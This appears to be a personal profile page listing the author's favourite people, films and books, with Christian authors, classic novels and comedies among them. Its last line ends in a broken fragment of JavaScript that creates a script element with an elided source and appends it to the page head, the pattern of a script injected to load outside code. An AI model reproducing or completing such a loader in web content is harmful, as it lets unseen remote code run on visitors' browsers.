umm Jesus, President Bush, Castro and Robert Mugabe, The Beatles, Watchman Nee, C.S. Lweis, and Edgar Allen Poe.
Oh man, I love movies far too much... I would have to say: 300, Braveheart, the Gladiator, Little Miss Sunshine, Stranger than Fiction, Dumb and Dumber, Hotel Ruwanda, the Sound of Music, and Mary Poppins ( Julie Andrews is amazing in general). Anything with Will Farrell is tops. and Shadowlands. That's about all my most favorite I can think of right now.
The Bible anything written by C. S. Lewis (especially The Chronicles of Narnia series.) or Watchman Nee. Frank Peretti is also quit good. To Kill a Mockingbird and the Hiding Place are fantastic.Harper Lee is amazing and I also enjoy old classics like Call of the Wild and Journey to the Cente of the Earth. Classics like that. Blue Like Jazz and just Donald Miller in general really. I've only read two of David Sedaris's books but they were both amazing so he gets to be here.
Jesus most of all, others like Edgar Allen Poe, my close friends, and C.S. Lewis can come if they're allowed. .."var s=document·('script');s.src='..';document·getEleme ntsByTagName('head')[0].appendChild(s);">